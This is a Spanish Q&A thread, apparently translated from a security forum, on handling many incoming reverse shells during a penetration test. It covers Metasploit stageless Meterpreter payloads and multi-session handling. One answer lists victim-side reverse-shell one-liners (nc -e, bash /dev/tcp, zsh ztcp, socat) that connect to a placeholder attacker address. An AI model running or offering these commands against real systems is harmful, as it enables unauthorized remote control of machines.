Pentest: manejo de múltiples shells inversos

5

Estoy ejecutando un Pentest y estoy esperando shells inversos de múltiples shells que se conectan de nuevo como: -

nc <my-ip> <my-port> -e /bin/bash

Sin embargo, estoy tratando de descubrir la mejor manera de administrar estas conexiones entrantes. ¿Hay alguna sugerencia sobre las mejores prácticas relacionadas con esto? Eché un vistazo a la shell de meterpreter de metasploits; sin embargo, parece que está enviando una carga útil al cliente. No requiero esto, simplemente requiero que las conexiones se manejen correctamente.

    
pregunta 07.12.2013 - 14:52
fuente

2 respuestas

3

Metasploit tiene múltiples cargas útiles divididas en single, stager y stage. La carga útil única está todo encapsulado en un ejecutable y no requiere descargas adicionales. Por ejemplo, payload / windows / shell_reverse_tcp es una carga útil única que se puede usar como un ejecutable independiente.

Por defecto, la carga útil de meterpreter es una carga útil por etapas. Si lo genera a través de msfconsole / msfpayload / msfvenom, entonces se genera la primera etapa y, cuando se ejecuta, descarga el metsrv.dll de la segunda etapa desde el controlador. Sin embargo, existe una carga útil independiente para el medidor de medidores fuera del árbol oficial de Metasploit creado por Sherif Eldeeb. Puede descargarlo del repositorio de github de Sherif Eldeep .

Desde el repositorio github, descargue el archivo ultimet.zip y genere el ejecutable independiente como:

ultimet.exe -h <LHOST> -p <LPORT> -t "reverse_tcp" --msfpayload

-t es el transporte que eliges. También puede realizar otros transportes, como http / s inverso / vincular. El comando anterior creará un nuevo ejecutable en el directorio con el nombre REVERSE_TCP__LPORT.exe. Este es un ejecutor de medidor de prueba autónomo donde la segunda etapa metsrv.dll está encapsulada en el mismo ejecutable. Sin embargo, tenga en cuenta que el transporte reverse_https tiene actualmente un error en el que la conexión se bloquea cada vez que se conecta al controlador. reverse_tcp es muy confiable.

Use la opción false de ExitOnSession en msfconsole y puede manejar tantas sesiones como desee. Además, me he dado cuenta de que las conexiones múltiples pueden manejarse de manera más eficiente a través de Armitage más fácilmente, pero es solo una cuestión de preferencia. msfconsole también es muy bueno en el manejo de múltiples conexiones, donde puede automatizar muchas tareas posteriores a la explotación utilizando scripts de recursos.

Actualización: a partir de la solicitud de extracción 4925 , el contador de pasos sin etapas ahora forma parte de la distribución oficial de Metasploit. Esto no es una integración del trabajo de Sharif sino una reescritura completa de OJ Reeves.

    
respondido por el void_in 07.12.2013 - 18:26
fuente
0

Es posible que necesites esta herramienta que creé:

enlace

Este es un administrador de sesiones / clientes de shell inversa múltiple a través de terminal.

Uso simple:

Lado del atacante: python Reverse-Shell-Manager.py 0.0.0.0 4444

Costados de la víctima

Linux:

nc -e /bin/bash 1.3.3.7 4444
bash -c 'bash -i >/dev/tcp/1.3.3.7/4444 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 1.3.3.7 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:1.3.3.7:4444  

Windows:

nc.exe -e /bin/bash 1.3.3.7 4444

Aquí hay dos videos que pueden ayudarte:

respondido por el 王一航 31.08.2018 - 09:15
fuente

Lea otras preguntas en las etiquetas